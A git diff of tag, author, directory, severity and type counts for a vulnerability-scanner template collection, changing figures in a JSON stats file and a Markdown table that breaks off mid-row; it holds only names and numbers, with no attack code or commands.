},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"me9187","count":3},{"name":"johnjhacking","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"idealphase","count":3},{"name":"0xrudra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"moritz nentwig","count":2},{"name":"g4l1t0","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"joeldeleep","count":2},{"name":"sy3omda","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"bernardofsr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r3naissance","count":2},{"name":"zomsop82","count":2},{"name":"hetroublemakr","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"random-robbie","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"alifathi-h1","count":2},{"name":"ehsahil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"r12w4n","count":2},{"name":"arcc","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xprial","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"_harleo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"x6263","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"makyotox","count":1},{"name":"b4uh0lz","count":1},{"name":"schniggie","count":1},{"name":"andysvints","count":1},{"name":"@ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"berkdusunur","count":1},{"name":"affix","count":1},{"name":"ilovebinbash","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"thezakman","count":1},{"name":"droberson","count":1},{"name":"s1r1u5_","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"juicypotato1","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"d0rkerdevil","count":1},{"name":"apt-mirror","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"omarkurt","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"adrianmf","count":1},{"name":"naglinagli","count":1},{"name":"chron0x","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"pudsec","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"elder tao","count":1},{"name":"elouhi","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"mubassirpatel","count":1},{"name":"ahmetpergamum","count":1},{"name":"ohlinge","count":1},{"name":"andirrahmani1","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"lark lab","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"alph4byt3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"dawid-czarnecki","count":1},{"name":"its0x08","count":1},{"name":"jrolf","count":1},{"name":"smaranchand","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"0xd0ff9","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kre80r","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"taielab","count":1},{"name":"patralos","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"0xteles","count":1},{"name":"0ut0fb4nd","count":1},{"name":"philippdelteil","count":1},{"name":"hakluke","count":1},{"name":"borna nematzadeh","count":1},{"name":"xstp","count":1},{"name":"thevillagehacker","count":1},{"name":"orpheus","count":1},{"name":"bad5ect0r","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"pdp","count":1},{"name":"aresx","count":1},{"name":"exploitation","count":1},{"name":"@dwisiswant0","count":1},{"name":"infosecsanyam","count":1},{"name":"defr0ggy","count":1},{"name":"sickwell","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1},{"name":"0xtavian","count":1},{"name":"nerrorsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"iampritam","count":1},{"name":"tirtha_mandal","count":1},{"name":"co0nan","count":1},{"name":"willd96","count":1},{"name":"gboddin","count":1},{"name":"izn0u","count":1},{"name":"52971","count":1},{"name":"luskabol","count":1},{"name":"retr0","count":1},{"name":"blckraven","count":1},{"name":"bolli95","count":1},{"name":"evolutionsec","count":1},{"name":"clarkvoss","count":1},{"name":"soyelmago","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"0h1in9e","count":1},{"name":"rojanrijal","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"un-fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"udyz","count":1},{"name":"zhenwarx","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"toufik airane","count":1},{"name":"yashanand155","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"knassar702","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"c3l3si4n","count":1},{"name":"raesene","count":1},{"name":"regala_","count":1},{"name":"flag007","count":1},{"name":"b0yd","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sshell","count":1},{"name":"brabbit10","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"shifacyclewla","count":1},{"name":"_c0wb0y_","count":1},{"name":"fmunozs","count":1},{"name":"nvn1729","count":1},{"name":"ajaysenr","count":1}],"directory":[{"name":"cves","count":831},{"name":"vulnerabilities","count":324},{"name":"exposed-panels","count":264},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":139},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":743},{"name":"high","count":641},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2195},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index a401b344fc..7e62861261 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,925 +1,925 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | -| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | -| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | | takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| iot | 68 | milo2012 | 14 | | | | | | | -| default-login | 68 | techbrunchfr | 13 | | | | | | | -| oob | 68 | suman_kar | 12 | | | | | | | -| token | 67 | r3dg33k | 11 | | | | | | | -| token-spray | 63 | cyllective | 11 | | | | | | | -| cve2017 | 51 | righettod | 10 | | | | | | | -| file | 50 | melbadry9 | 10 | | | | | | | -| unauth | 49 | nadino | 10 | | | | | | | +| default-login | 68 | milo2012 | 14 | | | | | | | +| oob | 68 | techbrunchfr | 13 | | | | | | | +| iot | 68 | suman_kar | 12 | | | | | | | +| token | 67 | cyllective | 11 | | | | | | | +| token-spray | 63 | r3dg33k | 11 | | | | | | | +| cve2017 | 51 | wdahlenb | 10 | | | | | | | +| file | 50 | nadino | 10 | | | | | | | +| unauth | 49 | melbadry9 | 10 | | | | | | | | network | 43 | random_robbie | 10 | | | | | | | -| ssrf | 41 | wdahlenb | 10 | | | | | | | +| ssrf | 41 | righettod | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | zh | 8 | | | | | | | -| redirect | 37 | iamthefrogy | 8 | | | | | | | +| | 38 | aashiq | 8 | | | | | | | | cve2016 | 37 | that_juan_ | 8 | | | | | | | -| oracle | 36 | aashiq | 8 | | | | | | | -| google | 30 | harshbothra_ | 7 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| jira | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 29 | dr_set | 7 | | | | | | | -| listing | 27 | emadshanab | 7 | | | | | | | -| cve2014 | 27 | meme-lord | 7 | | | | | | | +| redirect | 37 | zh | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | +| logs | 30 | dr_set | 7 | | | | | | | +| google | 30 | emadshanab | 7 | | | | | | | +| jira | 28 | 0x240x23elu | 7 | | | | | | | +| atlassian | 28 | dogasantos | 7 | | | | | | | +| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | | cisco | 27 | randomstr1ng | 7 | | | | | | | -| generic | 24 | dogasantos | 7 | | | | | | | -| auth-bypass | 23 | kophjager007 | 7 | | | | | | | -| misc | 23 | __fazal | 6 | | | | | | | -| disclosure | 23 | caspergn | 6 | | | | | | | -| misconfig | 21 | puzzlepeaches | 6 | | | | | | | -| router | 21 | pentest_swissky | 6 | | | | | | | -| aem | 19 | logicalhunter | 6 | | | | | | | -| springboot | 18 | divya_mudgal | 6 | | | | | | | -| sap | 18 | yanyun | 5 | | | | | | | -| debug | 18 | iamnoooob | 5 | | | | | | | -| cve2012 | 18 | xelkomy | 5 | | | | | | | -| php | 16 | rootxharsh | 5 | | | | | | | +| listing | 27 | kophjager007 | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | +| generic | 24 | oppsec | 7 | | | | | | | +| misc | 23 | meme-lord | 7 | | | | | | | +| disclosure | 23 | puzzlepeaches | 6 | | | | | | | +| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| router | 21 | divya_mudgal | 6 | | | | | | | +| misconfig | 20 | pentest_swissky | 6 | | | | | | | +| aem | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| cve2012 | 18 | ganofins | 5 | | | | | | | +| debug | 18 | rootxharsh | 5 | | | | | | | +| springboot | 18 | lu4nx | 5 | | | | | | | +| php | 16 | xelkomy | 5 | | | | | | | +| cve2011 | 15 | yanyun | 5 | | | | | | | | devops | 15 | johnk3r | 5 | | | | | | | -| cve2011 | 15 | panch0r3d | 5 | | | | | | | -| login | 14 | ganofins | 5 | | | | | | | -| fuzz | 14 | elsfa7110 | 5 | | | | | | | -| weblogic | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | lu4nx | 5 | | | | | | | -| struts | 14 | e_schultze_ | 4 | | | | | | | -| aws | 14 | tess | 4 | | | | | | | +| weblogic | 14 | iamnoooob | 5 | | | | | | | +| login | 14 | elsfa7110 | 5 | | | | | | | +| struts | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | panch0r3d | 5 | | | | | | | +| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| aws | 14 | github.com/its0x08 | 4 | | | | | | | | deserialization | 13 | incogbyte | 4 | | | | | | | -| dns | 13 | nodauf | 4 | | | | | | | -| android | 13 | github.com/its0x08 | 4 | | | | | | | -| zoho | 13 | z3bd | 3 | | | | | | | -| adobe | 13 | shifacyclewala | 3 | | | | | | | -| dlink | 12 | dudez | 3 | | | | | | | -| wp-theme | 12 | binaryfigments | 3 | | | | | | | -| jenkins | 12 | mavericknerd | 3 | | | | | | | -| manageengine | 12 | idealphase | 3 | | | | | | | -| cve2013 | 11 | skeltavik | 3 | | | | | | | -| magento | 11 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | yash anand @yashanand155 | 3 | | | | | | | -| hp | 10 | 0w4ys | 3 | | | | | | | -| dell | 10 | sullo | 3 | | | | | | | -| xxe | 10 | me9187 | 3 | | | | | | | -| kubernetes | 9 | sushantkamble | 3 | | | | | | | -| vmware | 9 | vsh00t | 3 | | | | | | | -| ftp | 9 | unstabl3 | 3 | | | | | | | -| cnvd | 8 | impramodsargar | 3 | | | | | | | -| nginx | 8 | fyoorer | 3 | | | | | | | -| microsoft | 8 | jarijaas | 3 | | | | | | | -| scada | 8 | f1tz | 3 | | | | | | | -| ibm | 8 | shine | 3 | | | | | | | -| airflow | 8 | emenalf | 3 | | | | | | | -| rails | 8 | thomas_from_offensity | 3 | | | | | | | -| ruijie | 8 | johnjhacking | 3 | | | | | | | -| fastjson | 8 | joeldeleep | 2 | | | | | | | -| gitlab | 8 | bp0lr | 2 | | | | | | | -| cve2008 | 8 | g4l1t0 | 2 | | | | | | | -| backup | 8 | bing0o | 2 | | | | | | | -| cms | 7 | mohammedsaneem | 2 | | | | | | | -| coldfusion | 7 | w4cky_ | 2 | | | | | | | -| netgear | 7 | randomrobbie | 2 | | | | | | | -| files | 7 | kiblyn11 | 2 | | | | | | | +| zoho | 13 | nodauf | 4 | | | | | | | +| dns | 13 | johnjhacking | 3 | | | | | | | +| android | 13 | fyoorer | 3 | | | | | | | +| adobe | 13 | emenalf | 3 | | | | | | | +| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | +| dlink | 12 | f1tz | 3 | | | | | | | +| wp-theme | 12 | jarijaas | 3 | | | | | | | +| jenkins | 12 | impramodsargar | 3 | | | | | | | +| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | +| cve2013 | 11 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | binaryfigments | 3 | | | | | | | +| xxe | 10 | tess | 3 | | | | | | | +| dell | 10 | 0w4ys | 3 | | | | | | | +| hp | 10 | unstabl3 | 3 | | | | | | | +| vmware | 9 | dudez | 3 | | | | | | | +| kubernetes | 9 | shine | 3 | | | | | | | +| ftp | 9 | vsh00t | 3 | | | | | | | +| gitlab | 8 | mavericknerd | 3 | | | | | | | +| cve2008 | 8 | sushantkamble | 3 | | | | | | | +| backup | 8 | me9187 | 3 | | | | | | | +| scada | 8 | sullo | 3 | | | | | | | +| rails | 8 | z3bd | 3 | | | | | | | +| ibm | 8 | shifacyclewala | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | idealphase | 3 | | | | | | | +| nginx | 8 | bp0lr | 2 | | | | | | | +| airflow | 8 | 0xrudra | 2 | | | | | | | +| microsoft | 8 | socketz | 2 | | | | | | | +| fastjson | 8 | g4l1t0 | 2 | | | | | | | +| netgear | 7 | 0xsapra | 2 | | | | | | | +| cms | 7 | w4cky_ | 2 | | | | | | | | confluence | 7 | udit_thakkur | 2 | | | | | | | -| drupal | 6 | koti2 | 2 | | | | | | | -| laravel | 6 | davidmckennirey | 2 | | | | | | | -| phpmyadmin | 6 | arcc | 2 | | | | | | | -| camera | 6 | gal nagli | 2 | | | | | | | -| solr | 6 | parth | 2 | | | | | | | -| citrix | 6 | huowuzhao | 2 | | | | | | | -| lucee | 6 | hetroublemakr | 2 | | | | | | | -| nodejs | 6 | 0xcrypto | 2 | | | | | | | -| jetty | 6 | nkxxkn | 2 | | | | | | | -| docker | 6 | swissky | 2 | | | | | | | -| fileupload | 6 | dheerajmadhukar | 2 | | | | | | | -| rconfig | 6 | lotusdll | 2 | | | | | | | -| django | 6 | 0xsmiley | 2 | | | | | | | -| api | 6 | r3naissance | 2 | | | | | | | -| printer | 5 | gevakun | 2 | | | | | | | -| jolokia | 5 | pxmme1337 | 2 | | | | | | | -| tomcat | 5 | x1m_martijn | 2 | | | | | | | -| java | 5 | ehsahil | 2 | | | | | | | -| headless | 5 | socketz | 2 | | | | | | | -| circarlife | 5 | r12w4n | 2 | | | | | | | -| ssti | 5 | whoever | 2 | | | | | | | -| crlf | 5 | ree4pwn | 2 | | | | | | | -| dedecms | 5 | alifathi-h1 | 2 | | | | | | | -| windows | 5 | afaq | 2 | | | | | | | -| iis | 5 | convisoappsec | 2 | | | | | | | -| npm | 4 | bernardofsr | 2 | | | | | | | -| amazon | 4 | vavkamil | 2 | | | | | | | -| zabbix | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| fatpipe | 4 | 0xprial | 2 | | | | | | | -| samsung | 4 | 0xsapra | 2 | | | | | | | -| hongdian | 4 | amsda | 2 | | | | | | | -| solarwinds | 4 | random-robbie | 2 | | | | | | | -| slack | 4 | moritz nentwig | 2 | | | | | | | -| thinkphp | 4 | 0xelkomy | 2 | | | | | | | +| coldfusion | 7 | bernardofsr | 2 | | | | | | | +| files | 7 | arcc | 2 | | | | | | | +| drupal | 6 | r3naissance | 2 | | | | | | | +| jetty | 6 | 0xelkomy | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| docker | 6 | 0xsmiley | 2 | | | | | | | +| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| solr | 6 | pxmme1337 | 2 | | | | | | | +| lucee | 6 | dheerajmadhukar | 2 | | | | | | | +| rconfig | 6 | koti2 | 2 | | | | | | | +| django | 6 | hetroublemakr | 2 | | | | | | | +| fileupload | 6 | davidmckennirey | 2 | | | | | | | +| api | 6 | huowuzhao | 2 | | | | | | | +| camera | 6 | vavkamil | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| windows | 5 | 